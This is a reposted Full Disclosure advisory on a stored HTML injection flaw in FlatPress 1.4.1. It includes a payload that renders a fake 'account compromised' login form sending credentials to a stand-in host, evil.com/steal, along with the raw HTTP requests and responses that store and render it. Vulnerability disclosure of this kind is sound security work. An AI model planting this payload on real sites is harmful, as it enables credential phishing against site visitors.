Stored HTML Injection - flatpressv1.4.1
FlatPress v1.4.1 存在 Stored HTML Injection 漏洞,允许攻击者通过注入恶意 HTML 代码在页面中显示虚假警告框并收集用户凭证。 2025-9-23 03:35:12 Author: seclists.org(查看原文) 阅读量:3 收藏
FlatPress v1.4.1 存在 Stored HTML Injection 漏洞,允许攻击者通过注入恶意 HTML 代码在页面中显示虚假警告框并收集用户凭证。 2025-9-23 03:35:12 Author: seclists.org(查看原文) 阅读量:3 收藏
Full Disclosure mailing list archives
From: Andrey Stoykov <mwebsec () gmail com>
Date: Sun, 21 Sep 2025 17:31:27 +0100
# Exploit Title: Stored HTML Injection - flatpressv1.4.1 # Date: 09/2025 # Exploit Author: Andrey Stoykov # Version: 1.4.1 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/2025/09/friday-fun-pentest-series-41-stored.html Stored HTML Injection: Steps to Reproduce: - Login with admin user and visit "Main" > "New Entry" > "Write Entry" and in the description enter the payload "[html]<div style="border:2px solid red;padding:20px;margin:20px;background:yellow"><h2>SECURITY ALERT</h2><p>Your account has been compromised. Please login again:</p><form action="https://evil.com/steal";><input type="text" placeholder="Username"><input type="password" placeholder="Password"><button>Login</button></form></div>[/html]" // HTTP POST Request POST /FlatPressns3ufyfxkj/admin.php?p=entry&action=write HTTP/1.1 Host: demos5.softaculous.com Cookie: __Secure-fpsess_fp-ea857882=ac74031571a2427832d0abef5c255d9e User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0 [...] _wpnonce=ee76fd6c94&_wp_http_referer=/FlatPressns3ufyfxkj/admin.php?p=entry&action=write&date_hour=16&date_minute=12&date_second=51&date_month=09&date_day=21&date_year=2025&subject=HTMLi×tamp=1758471158&entry=&attachselect=-- Selection --&imageselect=-- Selection --&content=[html]<div style="border:2px solid red;padding:20px;margin:20px;background:yellow"><h2>SECURITY ALERT</h2><p>Your account has been compromised. Please login again:</p><form action="https://evil.com/steal";><input type="text" placeholder="Username"><input type="password" placeholder="Password"><button>Login</button></form></div>[/html]&pl_file_meta=fp-content/content/seometa/default/metatags.ini&pl_description=&pl_keywords=&save=Publish // HTTP Response HTTP/1.1 302 Found Date: Sun, 21 Sep 2025 16:12:55 GMT Server: FlatPress [...] // HTTP GET Request GET /FlatPressns3ufyfxkj/index.php/2025/09/21/htmli/ HTTP/1.1 Host: demos5.softaculous.com Cookie: __Secure-fpsess_fp-ea857882=ac74031571a2427832d0abef5c255d9e User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0 [...] // HTTP Response HTTP/1.1 200 OK Date: Sun, 21 Sep 2025 16:12:58 GMT Server: FlatPress [...] [...] <div itemprop="articleBody"><p><div style="border:2px solid red;padding:20px;margin:20px;background:yellow"><h2>SECURITY ALERT</h2><p>Your account has been compromised. Please login again:</p><form action="https://evil.com/steal";><input type="text" placeholder="Username"><input type="password" placeholder="Password"><button>Login</button></form></div></p></div> [...] _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
Current thread:
- Stored HTML Injection - flatpressv1.4.1 Andrey Stoykov (Sep 22)
文章来源: https://seclists.org/fulldisclosure/2025/Sep/63
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh